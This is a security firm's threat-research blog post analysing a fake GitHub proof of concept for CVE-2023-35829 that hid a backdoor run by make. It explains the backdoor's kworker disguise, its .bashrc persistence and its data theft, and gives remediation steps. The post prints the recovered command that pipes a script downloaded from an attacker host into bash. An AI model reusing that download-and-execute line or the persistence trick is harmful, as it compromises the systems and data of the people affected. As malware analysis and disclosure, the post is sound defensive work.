  <div id="hs_cos_wrapper_blog-article-header" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><div class="blog-poster-header blog-article-header">
  <div class="content-outer">
    <div class="top-one">
      <div class="blog-box_inner">
        <div class="blog-box-content">
          <div class="banner-left">
            <div class="post-tags-mobile">
              
              
              <a href="https://www.uptycs.com/blog/threat-research-report-team/tag/threats"><span class="tag">Threats</span></a>
              
              
            </div>
            <div class="post_header">
              <h1><a href="https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware">PoC Exploit: Fake Proof of Concept with Backdoor Malware</a></h1>
            </div>
            <div class="bottom-sec">
              <div class="blog-post__meta">
                <time class="blog-post__timestamp">
                  July 12, 2023
                </time>
              </div>
              <div class="tag-and-social">
                <div class="post-tags">
                  
                  
                  <a href="https://www.uptycs.com/blog/threat-research-report-team/tag/threats"><span class="tag">Threats</span></a>
                  
                  
                </div>
                <div class="blogSharingLinks">
                  <span>Share</span>
                  <ul>
                    <li>
                      <a target="_blank" href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware">
                        <svg width="16" height="16" viewbox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
                          <path fill-rule="evenodd" clip-rule="evenodd" d="M16 16H12.7125V10.4007C12.7125 8.86546 12.1292 8.00755 10.9141 8.00755C9.59219 8.00755 8.90156 8.90034 8.90156 10.4007V16H5.73333V5.33333H8.90156V6.77013C8.90156 6.77013 9.85417 5.00745 12.1177 5.00745C14.3802 5.00745 16 6.38907 16 9.24653V16ZM1.95365 3.93662C0.874479 3.93662 0 3.05528 0 1.96831C0 0.881341 0.874479 0 1.95365 0C3.03281 0 3.90677 0.881341 3.90677 1.96831C3.90677 3.05528 3.03281 3.93662 1.95365 3.93662ZM0.317708 16H3.62135V5.33333H0.317708V16Z" fill="white" />
                        </svg>
                      </a>
                    </li>
                    <li>
                      <a target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware">
                        <svg width="11" height="20" viewbox="0 0 11 20" fill="none" xmlns="http://www.w3.org/2000/svg">
                          <path d="M3.047 10.781V19.166L6.796 19.167V10.782H9.592L10.124 7.312H6.796V5.062C6.796 4.113 7.261 3.188 8.752 3.188H10.266V0.235C10.266 0.235 8.892 0 7.58 0C4.839 0 3.047 1.662 3.047 4.669V7.311H0V10.781H3.047Z" fill="white" />
                        </svg>
                      </a>
                    </li>
                    <li>
                      <a target="_blank" href="https://twitter.com/intent/tweet?text=https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware">
                        <svg width="16" height="15" viewbox="0 0 16 15" fill="none" xmlns="http://www.w3.org/2000/svg">
                          <path d="M12.6007 0H15.054L9.694 6.35458L16 15H11.0627L7.196 9.75591L2.77067 15H0.316L6.04933 8.20288L0 0.0006915H5.06267L8.558 4.79394L12.6007 0ZM11.74 13.4774H13.0993L4.324 1.44309H2.86533L11.74 13.4774Z" fill="white" />
                        </svg>
                      </a>
                    </li>
                  </ul>
                </div>
              </div>
            </div>
            <div class="author-looping">
              <div class="author_section">
                
                <div class="author_image">
                  
                  <img class="blog-author-avatar" src="https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=200&amp;name=Logo-Shield_Padded_400x400.png" alt="Uptycs Threat Research" width="200" loading="eager" srcset="https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=100&amp;name=Logo-Shield_Padded_400x400.png 100w, https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=200&amp;name=Logo-Shield_Padded_400x400.png 200w, https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=300&amp;name=Logo-Shield_Padded_400x400.png 300w, https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=400&amp;name=Logo-Shield_Padded_400x400.png 400w, https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=500&amp;name=Logo-Shield_Padded_400x400.png 500w, https://www.uptycs.com/hs-fs/hubfs/Logo-Shield_Padded_400x400.png?width=600&amp;name=Logo-Shield_Padded_400x400.png 600w" sizes="(max-width: 200px) 100vw, 200px">
                  
                </div>
                <div class="author_bio">
                  <div class="written">
                    <p>
                      Uptycs Threat Research
                    </p>
                  </div>
                </div>
                
              </div>
              
            </div>
            <div class="demo-cta-head">
              <span id="hs_cos_wrapper_blog-article-header_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_cta" style="" data-hs-cos-general-type="widget" data-hs-cos-type="cta"><!--HubSpot Call-to-Action Code --><span class="hs-cta-wrapper" id="hs-cta-wrapper-1a13e157-4fa4-4234-852a-afcd55a998f7"><span class="hs-cta-node hs-cta-1a13e157-4fa4-4234-852a-afcd55a998f7" id="hs-cta-1a13e157-4fa4-4234-852a-afcd55a998f7"><!--[if lte IE 8]><div id="hs-cta-ie-element"></div><![endif]--><a href="https://cta-redirect.hubspot.com/cta/redirect/2617658/1a13e157-4fa4-4234-852a-afcd55a998f7" target="_blank" rel="noopener"><img class="hs-cta-img" id="hs-cta-img-1a13e157-4fa4-4234-852a-afcd55a998f7" style="border-width:0px;" src="https://no-cache.hubspot.com/cta/default/2617658/1a13e157-4fa4-4234-852a-afcd55a998f7.png" alt="Get a demo"></a></span><script charset="utf-8" src="/hs/cta/cta/current.js"></script><script type="text/javascript"> hbspt.cta._relativeUrls=true;hbspt.cta.load(2617658, '1a13e157-4fa4-4234-852a-afcd55a998f7', {"useNewLoader":"true","region":"na1"}); </script></span><!-- end HubSpot Call-to-Action Code --></span>
            </div>
          </div>

          <div class="banner-right">
            <div class="featured-image">
              
              <img src="https://www.uptycs.com/hubfs/POC%20door.jpg" alt="PoC Exploit: Fake Proof of Concept with Backdoor Malware">
              
            </div>
          </div>

        </div>


      </div>
    </div>

    
    <div class="blog-post__tags">
      Tags
      
      <a class="blog-post__tag-link" href="https://www.uptycs.com/blog/threat-research-report-team/tag/threats" rel="tag">Threats</a>
      
    </div>
     
  </div>
</div>


</div> 


   
  <div class="blogPostBottomArea">
    <div class="wrapper">
      <div class="blogPostAreaRow d_flex space_between align_start"> 
        
        <div class="content-wrapper blog--post-content-section">
          <article class="blog-post">
            
            <div class="blog-post__tags">
              Tags
              
              <a class="blog-post__tag-link" href="https://www.uptycs.com/blog/threat-research-report-team/tag/threats" rel="tag">Threats</a>
              
            </div>
             
            <div class="blog-post__body">
              <span id="hs_cos_wrapper_post_body" class="hs_cos_wrapper hs_cos_wrapper_meta_field hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="meta_field" data-hs-cos-type="rich_text"><p style="font-weight: normal;"><span style="font-weight: bold;">Threat Researchers:</span> <span style="color: #cafa3c;">Nischay Hegde</span> and <span style="color: #cafa3c;">Siddartha Malladi</span></p>
<!--more-->
<p>&nbsp;</p>
<p>A deceptive twist has appeared within cybersecurity norms—a proof of concept (PoC) that, rather than demonstrating a vulnerability, stealthily harbors a hidden backdoor. Recently discovered by the Uptycs threat research team, our finding particularly impacts the security research community.</p>
<p>&nbsp;</p>
<p>As their primary users, security researchers rely on PoCs to understand potential vulnerabilities by way of innocuous testing. In this instance, the PoC is a wolf in sheep's clothing, harboring malicious intent under the guise of a harmless learning tool. Its concealed backdoor presents a stealthy, persistent threat. Operating as a downloader, it silently dumps and executes a Linux bash script, all the while disguising its operations as a kernel-level process.</p>
<p>&nbsp;</p>
<p>Its persistence methodology is quite crafty. Used to build executables from source code files, it leverages the <span style="font-size: 12px;">make</span> command to create a <span style="font-size: 16px; font-family: 'Courier New', Courier, monospace;">kworker</span> file and adds its file path to the <span style="font-size: 16px; font-family: 'Courier New', Courier, monospace;">bashrc</span> file, thus enabling the malware to continually operate within a victim's system.</p>
<p>&nbsp;</p>
<p>The backdoor has broad data theft capabilities. It can exfiltrate a wide array of data—from the hostname and username to an exhaustive list of home directory contents. Moreover, an attacker can gain full access to a target system by adding their ssh key to the <span style="font-size: 16px; font-family: 'Courier New', Courier, monospace;">authorized_keys</span> file.</p>
<p>&nbsp;</p>
<p>Despite its removal from GitHub, this malicious PoC has been widely shared, achieving significant engagement before its nefarious nature was exposed. For those who have executed it, the likelihood of data compromise is high. Therefore it’s crucial to:</p>
<p>&nbsp;</p>
<ul style="font-size: 16px;">
<li aria-level="1">remove any unauthorized ssh keys</li>
<li aria-level="1">delete the<span style="font-family: 'Courier New', Courier, monospace;"> kworker</span> file</li>
<li aria-level="1">remove the kworker path from the <span style="font-family: 'Courier New', Courier, monospace;">bashrc</span> file</li>
<li aria-level="1">check <span style="font-family: 'Courier New', Courier, monospace;">/tmp/.iCE-unix.pid</span> for potential threats</li>
</ul>
<p>While it can be challenging to distinguish legitimate PoCs from deceptive ones, adopting safe practices such as testing in isolated environments (e.g., virtual machines) can provide a layer of protection.</p>
<p>Although not entirely new, this trend of spreading malware through PoCs poses a significant concern, and it's likely we’ll see this tactic continue to evolve. The Uptycs threat research team remains vigilant in uncovering such threats, thereby helping the security research community to stay abreast of evolving cybersecurity risks.</p>
<div class="hs-cta-embed hs-cta-simple-placeholder hs-cta-embed-141040881575" style="max-width: 100%; max-height: 100%; width: 700px; height: 238.9453125px;" data-hubspot-wrapper-cta-id="141040881575"><a href="https://cta-service-cms2.hubspot.com/web-interactives/public/v1/track/redirect?encryptedPayload=AVxigLLQHtctZ%2Fk4gkkoyGQWvSlecYvxk1rVq2F3PWxjw31dsOECbFKBiH0KrLplKcccSPlK8lYe%2BpLmpWKtz8nCD8HkQTaO021OOjE08d9lX6dUQb3Q50DE5kKGcOhAjymZHlAHCYjstxalObEw5xKr9MVcVxHyylefmilMm1ESxyI8T8jQOjC9Z3IKCWfRllZc%2BPmB5sarxcIJFYcmrSKW6ZdNrPk6JQ%3D%3D&amp;webInteractiveContentId=141040881575&amp;portalId=2617658" target="_blank" rel="noopener" crossorigin="anonymous"> <img alt="Q3 Threat Intelligence Report Get the latest insights on security threats affecting Linux, Windows, and macOS platforms in 2023 &nbsp;" loading="lazy" src="https://no-cache.hubspot.com/cta/default/2617658/interactive-141040881575.png" style="height: 100%; width: 100%; object-fit: fill;" onerror="this.style.display='none'"> </a></div>
<p>&nbsp;</p>
<h2>Unveiling the Fake PoC</h2>
<p>While testing PoCs of various CVEs, our team encountered <span>one</span> claiming to address CVE-2023-35829 (a critical vulnerability), its unusual activity being detected by Uptycs XDR. Significant irregularities suggested it might be deceptive in nature, prompting us to question its legitimacy.</p>
<p>&nbsp;</p>
<p>Suspicious activity included unexpected network connections, unusual data transfers, and unauthorized system access attempts. Further investigation fleshed out aclocal.m4 as the initial file requiring additional analysis.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=769&amp;height=534&amp;name=Figure%201-4.png" alt="Figure 1 - PoC repository files" width="769" height="534" loading="lazy" style="height: auto; max-width: 100%; width: 769px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=385&amp;height=267&amp;name=Figure%201-4.png 385w, https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=769&amp;height=534&amp;name=Figure%201-4.png 769w, https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=1154&amp;height=801&amp;name=Figure%201-4.png 1154w, https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=1538&amp;height=1068&amp;name=Figure%201-4.png 1538w, https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=1923&amp;height=1335&amp;name=Figure%201-4.png 1923w, https://www.uptycs.com/hs-fs/hubfs/Figure%201-4.png?width=2307&amp;height=1602&amp;name=Figure%201-4.png 2307w" sizes="(max-width: 769px) 100vw, 769px"><span style="font-size: 14px;"><em>Figure 1 – PoC repository files</em></span></p>
<p>&nbsp;</p>
<p><span style="font-family: 'Courier New', Courier, monospace;">aclocal.m4</span> is normally part of <span style="font-family: 'Courier New', Courier, monospace;">automake</span>, used by <span style="font-family: 'Courier New', Courier, monospace;">autoconf</span> to consolidate macros. And it’s usually not an <span style="font-family: 'Courier New', Courier, monospace;">elf</span> (executable and linkable format) file as it is here.</p>
<p>&nbsp;</p>
<p>Figure 2 shows how <span style="font-family: 'Courier New', Courier, monospace;">make</span> triggers <span style="font-family: 'Courier New', Courier, monospace;">src/aclocal.m4</span>, which is the focus of this article.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=624&amp;height=552&amp;name=Figure%202-3.png" alt="Figure 2 - The offending makefile" width="624" height="552" loading="lazy" style="height: auto; max-width: 100%; width: 624px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=312&amp;height=276&amp;name=Figure%202-3.png 312w, https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=624&amp;height=552&amp;name=Figure%202-3.png 624w, https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=936&amp;height=828&amp;name=Figure%202-3.png 936w, https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=1248&amp;height=1104&amp;name=Figure%202-3.png 1248w, https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=1560&amp;height=1380&amp;name=Figure%202-3.png 1560w, https://www.uptycs.com/hs-fs/hubfs/Figure%202-3.png?width=1872&amp;height=1656&amp;name=Figure%202-3.png 1872w" sizes="(max-width: 624px) 100vw, 624px"><em><span style="font-size: 14px;">Figure 2 – The offending makefile</span></em></p>
<p>&nbsp;</p>
<h2>Technical Analysis</h2>
<p>The binary’s main function begins with an interesting string—<span style="font-family: 'Courier New', Courier, monospace;">kworker</span> (figure 3).</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=767&amp;height=714&amp;name=Figure%203-2.png" alt="Figure 3-2" width="767" height="714" loading="lazy" style="height: auto; max-width: 100%; width: 767px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=384&amp;height=357&amp;name=Figure%203-2.png 384w, https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=767&amp;height=714&amp;name=Figure%203-2.png 767w, https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=1151&amp;height=1071&amp;name=Figure%203-2.png 1151w, https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=1534&amp;height=1428&amp;name=Figure%203-2.png 1534w, https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=1918&amp;height=1785&amp;name=Figure%203-2.png 1918w, https://www.uptycs.com/hs-fs/hubfs/Figure%203-2.png?width=2301&amp;height=2142&amp;name=Figure%203-2.png 2301w" sizes="(max-width: 767px) 100vw, 767px"><span style="font-size: 14px;"><em>Figure 3 – The start of the binary</em></span></p>
<p>&nbsp;</p>
<p>Line 79 checks if the binary is named <span style="font-family: 'Courier New', Courier, monospace;">kworker</span>. If true, flow passes to the <span style="font-family: 'Courier New', Courier, monospace;">else</span> condition in line 84. If not, two functions are executed called <span style="font-family: 'Courier New', Courier, monospace;">copy_to_kworker()</span> and <span style="font-family: 'Courier New', Courier, monospace;">add_to_bashrc()</span>. Establishing backdoor persistence, these copy the current file to <span style="font-family: 'Courier New', Courier, monospace;">$HOME/.local/kworker</span> and add its file path to the <span style="font-family: 'Courier New', Courier, monospace;">$HOME/.bashrc file</span>.&nbsp;<br><br>To conceal its presence, the program embeds itself in <span style="font-family: 'Courier New', Courier, monospace;">bashrc</span>. The <span style="font-family: 'Courier New', Courier, monospace;">check_for_pidfile()</span> function (figure 4) helps ensure that multiple instances of the same program aren’t running simultaneously.&nbsp;</p>
<p>&nbsp;</p>
<p><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=767&amp;height=712&amp;name=Figure%204-2.png" alt="Figure 4 - Check_for_pidfile() function" width="767" height="712" loading="lazy" style="height: auto; max-width: 100%; width: 767px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=384&amp;height=356&amp;name=Figure%204-2.png 384w, https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=767&amp;height=712&amp;name=Figure%204-2.png 767w, https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=1151&amp;height=1068&amp;name=Figure%204-2.png 1151w, https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=1534&amp;height=1424&amp;name=Figure%204-2.png 1534w, https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=1918&amp;height=1780&amp;name=Figure%204-2.png 1918w, https://www.uptycs.com/hs-fs/hubfs/Figure%204-2.png?width=2301&amp;height=2136&amp;name=Figure%204-2.png 2301w" sizes="(max-width: 767px) 100vw, 767px"></p>
<p style="font-size: 14px; text-align: center;"><em>Figure 4 – Check_for_pidfile() function</em></p>
<p>&nbsp;</p>
<p>After checking the<span style="font-family: 'Courier New', Courier, monospace;"> /tmp/.ICE-unix.pid</span> path, it writes the PID of the currently running process if no function has used <span style="font-family: 'Courier New', Courier, monospace;">flock(2)</span> to restrict file access. The program proceeds only if the main function returns zero (<span style="font-family: 'Courier New', Courier, monospace;">0</span>), indicating the current process is exclusive.&nbsp;</p>
<p>&nbsp;</p>
<p><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=770&amp;height=711&amp;name=Figure%205-2.png" alt="Figure 5 - Main function else portion" width="770" height="711" loading="lazy" style="height: auto; max-width: 100%; width: 770px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=385&amp;height=356&amp;name=Figure%205-2.png 385w, https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=770&amp;height=711&amp;name=Figure%205-2.png 770w, https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=1155&amp;height=1067&amp;name=Figure%205-2.png 1155w, https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=1540&amp;height=1422&amp;name=Figure%205-2.png 1540w, https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=1925&amp;height=1778&amp;name=Figure%205-2.png 1925w, https://www.uptycs.com/hs-fs/hubfs/Figure%205-2.png?width=2310&amp;height=2133&amp;name=Figure%205-2.png 2310w" sizes="(max-width: 770px) 100vw, 770px"></p>
<p style="font-size: 14px; text-align: center;"><em>Figure 5 – Main function <span style="font-family: 'Courier New', Courier, monospace;">else</span> portion</em></p>
<p>&nbsp;</p>
<p>Achieved by forking the program, a new string <span style="font-family: 'Courier New', Courier, monospace;">[kworker/8:3]</span> is created In the main function to obscure the original command line parameters. Subsequently, the parent process executes the <span style="font-family: 'Courier New', Courier, monospace;">curl_func()</span> function, which uses the libcurl library to download a URL that is obfuscated so as basic static analysis can’t easily find it. The URL is <span style="font-family: 'Courier New', Courier, monospace;">hxxp[:]//cunniloss[.]accesscam[.]org/hash[.]php</span>; it contains a bash script that is run if the curl request succeeds.&nbsp;<br><br>(<span style="font-family: 'Courier New', Courier, monospace;">libcurl</span> provides programmatic access to <span style="font-family: 'Courier New', Courier, monospace;">curl</span>; it can be directly included in a binary {statically compiled} or called dynamically.)</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=757&amp;height=461&amp;name=Figure%206-1.png" alt="Figure 6 - Excerpt from curl_func()" width="757" height="461" loading="lazy" style="height: auto; max-width: 100%; width: 757px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=379&amp;height=231&amp;name=Figure%206-1.png 379w, https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=757&amp;height=461&amp;name=Figure%206-1.png 757w, https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=1136&amp;height=692&amp;name=Figure%206-1.png 1136w, https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=1514&amp;height=922&amp;name=Figure%206-1.png 1514w, https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=1893&amp;height=1153&amp;name=Figure%206-1.png 1893w, https://www.uptycs.com/hs-fs/hubfs/Figure%206-1.png?width=2271&amp;height=1383&amp;name=Figure%206-1.png 2271w" sizes="(max-width: 757px) 100vw, 757px"><em><span style="font-size: 14px;">Figure 6 – Excerpt from curl_func()</span></em></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=764&amp;height=826&amp;name=Figure%207-1.png" alt="Figure 7 - Code portion that downloads the bash script" width="764" height="826" loading="lazy" style="height: auto; max-width: 100%; width: 764px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=382&amp;height=413&amp;name=Figure%207-1.png 382w, https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=764&amp;height=826&amp;name=Figure%207-1.png 764w, https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=1146&amp;height=1239&amp;name=Figure%207-1.png 1146w, https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=1528&amp;height=1652&amp;name=Figure%207-1.png 1528w, https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=1910&amp;height=2065&amp;name=Figure%207-1.png 1910w, https://www.uptycs.com/hs-fs/hubfs/Figure%207-1.png?width=2292&amp;height=2478&amp;name=Figure%207-1.png 2292w" sizes="(max-width: 764px) 100vw, 764px"><em><span style="font-size: 14px;">Figure 7 – Code portion that downloads the bash script</span></em></p>
<p>&nbsp;</p>
<p>The <span style="font-family: 'Courier New', Courier, monospace;">%s</span> variable is replaced by the curl request output, which implies that the following is the command run by kworker:</p>
<p style="padding-left: 40px;"><br><span style="font-family: 'Courier New', Courier, monospace;">sh -c wget -q -O - http[:]//cunniloss[.]accesscam[.]org/do[.]php?u=$(whoami) | bash 2&gt;&amp;1 &gt; /dev/null</span></p>
<p>&nbsp;</p>
<h2>Deconstructing the Bogus PoC</h2>
<p>This PoC is copied from an old, legitimate <a href="https://github.com/randorisec/CVE-2022-34918-LPE-PoC" rel="noopener" target="_blank">PoC</a> of a Linux kernel vulnerability, CVE-2022-34918. On the surface, it appears to be an authentic demonstration, complete with strings that mimic genuine output. But the true nature of this deception becomes apparent upon closer examination of its code—particularly the discrepancies found within <span style="font-family: 'Courier New', Courier, monospace;">modprobe.c</span>.<br><br>A <span style="font-family: 'Courier New', Courier, monospace;">new_sn()</span> function in the fake <span style="font-family: 'Courier New', Courier, monospace;">modprobe.c</span> allocates memory, attempts to open a specific file, closes the file if it was successfully opened, generates a random number, then pauses program execution for a random duration.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=1910&amp;height=889&amp;name=Figure%208-1.png" alt="Figure 8 - Comparison of modprobe.c between the PoCs" width="1910" height="889" loading="lazy" style="height: auto; max-width: 100%; width: 1910px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=955&amp;height=445&amp;name=Figure%208-1.png 955w, https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=1910&amp;height=889&amp;name=Figure%208-1.png 1910w, https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=2865&amp;height=1334&amp;name=Figure%208-1.png 2865w, https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=3820&amp;height=1778&amp;name=Figure%208-1.png 3820w, https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=4775&amp;height=2223&amp;name=Figure%208-1.png 4775w, https://www.uptycs.com/hs-fs/hubfs/Figure%208-1.png?width=5730&amp;height=2667&amp;name=Figure%208-1.png 5730w" sizes="(max-width: 1910px) 100vw, 1910px"><span style="font-size: 14px;"><em>Figure 8 – Comparison of modprobe.c between the PoCs</em></span></p>
<p>&nbsp;</p>
<p>A <span style="font-family: 'Courier New', Courier, monospace;">prepare_root_shell()</span> function prints some strings and calls the setup_modprobe_payoad() function based on the condition. It exits with a status code of <span style="font-family: 'Courier New', Courier, monospace;">0</span> after completing these operations.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=1920&amp;height=889&amp;name=Figure%209-1.png" alt="Figure 9 - Code portion that prints legitimate looking strings" width="1920" height="889" loading="lazy" style="height: auto; max-width: 100%; width: 1920px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=960&amp;height=445&amp;name=Figure%209-1.png 960w, https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=1920&amp;height=889&amp;name=Figure%209-1.png 1920w, https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=2880&amp;height=1334&amp;name=Figure%209-1.png 2880w, https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=3840&amp;height=1778&amp;name=Figure%209-1.png 3840w, https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=4800&amp;height=2223&amp;name=Figure%209-1.png 4800w, https://www.uptycs.com/hs-fs/hubfs/Figure%209-1.png?width=5760&amp;height=2667&amp;name=Figure%209-1.png 5760w" sizes="(max-width: 1920px) 100vw, 1920px"><span style="font-size: 14px;">Figure 9 – Code portion that prints legitimate looking strings</span></p>
<p>&nbsp;</p>
<p>The aforementioned <span style="font-family: 'Courier New', Courier, monospace;">setup_modprobe_payoad()</span> assigns a value to the <span style="font-family: 'Courier New', Courier, monospace;">filename</span> variable, then executes a <span style="font-family: 'Courier New', Courier, monospace;">/bin/sh</span> command to open a new system shell. It then frees the memory allocated to <span style="font-family: 'Courier New', Courier, monospace;">filename</span>.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=1920&amp;height=883&amp;name=Figure%2010-1.png" alt="Figure 10 - Code segment that shows it is faking the shell" width="1920" height="883" loading="lazy" style="height: auto; max-width: 100%; width: 1920px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=960&amp;height=442&amp;name=Figure%2010-1.png 960w, https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=1920&amp;height=883&amp;name=Figure%2010-1.png 1920w, https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=2880&amp;height=1325&amp;name=Figure%2010-1.png 2880w, https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=3840&amp;height=1766&amp;name=Figure%2010-1.png 3840w, https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=4800&amp;height=2208&amp;name=Figure%2010-1.png 4800w, https://www.uptycs.com/hs-fs/hubfs/Figure%2010-1.png?width=5760&amp;height=2649&amp;name=Figure%2010-1.png 5760w" sizes="(max-width: 1920px) 100vw, 1920px"><em><span style="font-size: 14px;">Figure 10 – Code segment that shows it is faking the shell</span></em></p>
<p>&nbsp;</p>
<p>In its entirety, the bogus PoC sleeps for a random duration, prints legitimate-looking strings, ultimately launching a<span style="font-family: 'Courier New', Courier, monospace;"> /bin/bash</span> shell.<br><br>Curiously, when executing <span style="font-family: 'Courier New', Courier, monospace;">whoami</span> within this shell, it falsely reports the user ID as <span style="font-family: 'Courier New', Courier, monospace;">root</span>. This deception is accomplished by exploiting the difference in the user namespace ID inside and outside the PoC root shell.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=792&amp;height=581&amp;name=Figure%2011-1.png" alt="Figure 11 - Listing namespaces inside PoC root shell" width="792" height="581" loading="lazy" style="height: auto; max-width: 100%; width: 792px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=396&amp;height=291&amp;name=Figure%2011-1.png 396w, https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=792&amp;height=581&amp;name=Figure%2011-1.png 792w, https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=1188&amp;height=872&amp;name=Figure%2011-1.png 1188w, https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=1584&amp;height=1162&amp;name=Figure%2011-1.png 1584w, https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=1980&amp;height=1453&amp;name=Figure%2011-1.png 1980w, https://www.uptycs.com/hs-fs/hubfs/Figure%2011-1.png?width=2376&amp;height=1743&amp;name=Figure%2011-1.png 2376w" sizes="(max-width: 792px) 100vw, 792px"><em><span style="font-size: 14px;">Figure 11 – Listing namespaces inside PoC root shell</span></em></p>
<p>&nbsp;</p>
